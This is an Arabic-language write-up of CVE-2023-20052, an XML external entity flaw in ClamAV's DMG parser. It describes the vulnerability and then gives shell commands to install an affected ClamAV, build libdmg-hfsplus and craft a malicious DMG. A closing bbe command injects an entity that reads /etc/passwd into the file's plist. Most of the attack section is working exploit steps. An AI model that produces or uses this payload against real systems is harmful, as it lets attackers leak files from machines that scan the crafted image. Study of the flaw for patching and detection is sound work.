
ثغرة تسرب معلومات CVE-2023-20052 في محلل ملفات DMG في ClamAV
ثغرة تسريب معلومات CVE-2023-20052 في محلل ملفات DMG الخاص بـ ClamAV
ثغرة في محلل ملفات DMG في إصدارات ClamAV 1.0.0 والإصدارات الأقدم، و 0.105.1 والإصدارات الأقدم، و 0.103.7 والإصدارات الأقدم قد تسمح لمهاجم غير مصادق عن بُعد بالوصول إلى معلومات حساسة على جهاز متأثر. تنشأ هذه الثغرة بسبب تمكين استبدال كيانات XML مما قد يؤدي إلى حقن كيان خارجي XML. يمكن للمهاجم استغلال هذه الثغرة عن طريق إرسال ملف DMG معد لفحصه بواسطة ClamAV على جهاز متأثر. يمكن للاستغلال الناجح أن يسمح للمهاجم بتسريب بايتات من أي ملف قد يتم قراءته بواسطة عملية فحص ClamAV.
sudo dpkg -i package-name.deb

sudo apt install -f
mkdir /usr/local/share/clamav
mv /usr/local/etc/freshclam.conf.sample /usr/local/etc/freshclam.conf

sudo adduser clamav

sudo chown -R 1002:1003 /usr/local/share/clamav
sudo freshclam



apt-get update
apt-get install -y ca-certificates gnupg wget
echo "deb http://archive.debian.org/debian-security stretch/updates main" >> /etc/apt/sources.list
wget -q -O - https://ftp-master.debian.org/keys/archive-key-9-security.asc | apt-key add -
apt-get update -y
sudo apt install -y libssl1.0-dev gcc g++ cmake zlib1g-dev genisoimage bbe git hfsplus

cd /libdmg-hfsplus
cmake .

make

cp dmg/dmg /bin
sudo genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg

bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit2.dmg

